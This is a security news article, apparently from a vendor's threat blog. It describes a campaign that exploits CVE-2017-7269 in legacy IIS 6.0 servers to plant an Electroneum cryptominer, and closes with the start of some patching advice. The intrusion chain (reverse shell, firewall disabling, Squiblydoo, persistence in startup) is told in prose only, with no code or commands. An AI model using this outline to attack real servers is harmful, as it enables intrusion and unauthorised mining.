Latest Threats

2017 Annual Security Roundup

The top security events of the past year make this apparent — and their repercussions make the implementation of smart protections all the more important.View the 2017 Annual Security Roundup

2018 SECURITY PREDICTIONS

Today's increasingly interconnected environments pave the way for threats that will bank on systems' weaknesses for different forms of cybercrime. How can you prepare for the year ahead?View the 2018 Security Predictions

Microsoft IIS 6.0 Targeted for Electroneum Cryptomining Campaign

Researchers uncovered a campaign that has been targeting several systems still running on Microsoft Internet Information Services (IIS) 6.0 servers to mine Electroneumcryptocurrency (ETN). The cryptomining campaign exploits CVE-2017-7269, a year-old disclosed vulnerability known to have been previously used to mine Monero. North Korean hacker group Lazarus also exploited the same vulnerability to launch attacks against organizations.

Attackers are still exploiting vulnerabilities in the IIS 6.0 despite being declared end-of-life three years ago. The security researchers found that the exploit used in this campaign is similar to an exploit for a buffer overflow vulnerability disclosed in March 2017; the difference lies in the shellcode used in this campaign's commands. The alphanumeric or Unicode characters use ASCII shellcode to contain a Return-Oriented Programming (ROP) chain, which allows the attacker to bypass input restrictions and open a reverse shell to a malicious remote server. A reverse shell is a type of interactive shell wherein the victimized machine communicates with the cybercriminal’s remote machine and waits for shell commands to execute.

The targeted system receives two commands once connected to the attacker' machine; the first command disables the compromised machine’s firewall, and an exploit technique called Squiblydoo, which whitelists the attacker’s commands as a legitimate Microsoft binary. The attacker can execute a remote Extensible Markup Language (XML) containing scriptlets with the codes of choice. It rolls back to mimic legitimate and critical Microsoft Visual Basic scripts and processes before inserting the cryptominer in the system startup to make it look like a legitimate OS process.

The attackers only earned $99 from the campaign at the time the researchers published their report, initially implying that the entire operation was relatively unsuccessful. Possible explanations for the low number: Either there may not be that many vulnerable IIS 6.0 servers left to exploit, or that the cybercriminals may be changing wallet addresses from time to time.

It is always recommended to upgrade systems and move from legacy servers, though organizations might prefer to hold out to prepare accordingly. It's not easy to secure and manage legacy systems, especially for enterprises. Further, the training and migration of data required involve compliance, compatibility, and alignment concerns that require considerable company resources. Threat actors are always on the lookout for these systems’ changes because these upgrades could take months to implement, possibly leaving entire networks open for attack. Here are a few recommendations for managing your legacy systems:

Operating systems release emergency patches even for end-of-life products. Make sure to patch whenever these are made available